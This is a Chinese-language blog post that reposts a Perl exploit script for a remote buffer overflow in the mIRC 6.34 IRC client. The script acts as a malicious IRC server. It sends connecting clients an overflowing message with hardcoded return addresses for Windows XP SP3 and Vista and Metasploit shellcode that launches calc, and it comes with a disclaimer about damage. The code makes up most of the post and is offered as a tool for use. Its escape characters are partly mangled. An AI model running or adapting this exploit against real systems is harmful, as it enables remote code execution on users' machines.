好久没给大家提供漏洞类的东西了,这个blog都快成软件类blog了,究其原因,是因为夜火我技术太菜了,很多漏洞看不懂,看不懂的我也懒得发,以免过多的人说俺装B。
但是也不能不发吧,发出来的文章,技术深度肯定要浅些的,甚至不用太多技术。比如直接的利用工具,这篇文章就是。
mIRC 6.34 Remote Buffer Overflow Exploit****mIRC 6.34 远程缓冲区溢出漏洞利用工具
#!/usr/bin/perl
mIRC 6.34 Remote Buffer Overflow Exploit
Exploit by SkD (skdrat hotmail <.> com)
—————————————-
A day’s work of debugging and looking at mIRC.
Tested on Windows XP SP3 English and Windows Vista SP0.
Credits to securfrog for publishing the PoC.
Author has no responsibility over the damage you do with this!
Note: You might change the addresses for Vista ;)
—————————————-
use IO::Socket;
if(!($ARGV[1]))
{
print “
[x] mIRC 6.34 Remote Buffer Overflow Exploit
”;
print “[x] Exploit by SkD (skdrat@ hotmail.com)
”;
print “[x] Use: mirc_exp.pl
while(1) {
my $sock=new IO::Socket::INET ( Listen => 1,
LocalAddr => ‘127.0.0.1′,
LocalPort => $ARGV[0],
Proto => ‘tcp’);
die unless $sock;
win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode = “x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x1e”. “x95x97xf1x83xebxfcxe2xf4xe2x7dxd3xf1x1ex95x1cxb4″. “x22x1exebxf4x66x94x78x7ax51x8dx1cxaex3ex94x7cxb8″. “x95xa1x1cxf0xf0xa4x57x68xb2x11x57x85x19x54x5dxfc”. “x1fx57x7cx05x25xc1xb3xf5x6bx70x1cxaex3ax94x7cx97″. “x95x99xdcx7ax41x89x96x1ax95x89x1cxf0xf5x1cxcbxd5″. “x1ax56xa6x31x7ax1exd7xc1x9bx55xefxfdx95xd5x9bx7a”. “x6ex89x3ax7ax76x9dx7cxf8x95x15x27xf1x1ex95x1cx99″. “x22xcaxa6x07x7exc3x1ex09x9dx55xecxa1x76x65x1dxf5″. “x41xfdx0fx0fx94x9bxc0x0exf9xf6xf6x9dx7dx95x97xf1″;
print “[x] Listening on port “.$ARGV[0].”.. ”; $s=$sock->accept(); print “[x] Got a user! ”; $overflow = “x41″ x 307; $overflow2 = “B” x 12; $eip_vista = “x66x1cxc2x76″; #Normaliz.DLL pop pop ret $eip2_vista = “xd3xdbx54x77″; #MSFCT.DLL jmp esp $eip_xpsp3 = “xd1xfbx92x77″; #SETUPAPI.DLL 0×7792FBD1 pop eax pop ret $eip2_xpsp3 = “xb7x87x9dx77″; #SETUPAPI.DLL 0×779D87B7 jmp esp $addr = “xb5xb5xfdx7f”; $nop_sled = “x90″ x 4; $jmp = “xEBx03xFFxFF”;
print “[x] Sending packets.. ”;
print $s “
.com 001 wow to the Internet Relay Network wow ”; sleep(1); if($ARGV[1] == “1″){ print $s “:”.$overflow.$eip_xpsp3.$addr.$nop_sled.$eip2_xpsp3.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled.” PRIVMSG wow : /FINGER wow. ”; }else{ print $s “:”.$overflow.$eip_vista.$addr.$nop_sled.$eip2_vista.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled.” PRIVMSG wow : /FINGER wow. ”; } print “[x] Check it out! ”; }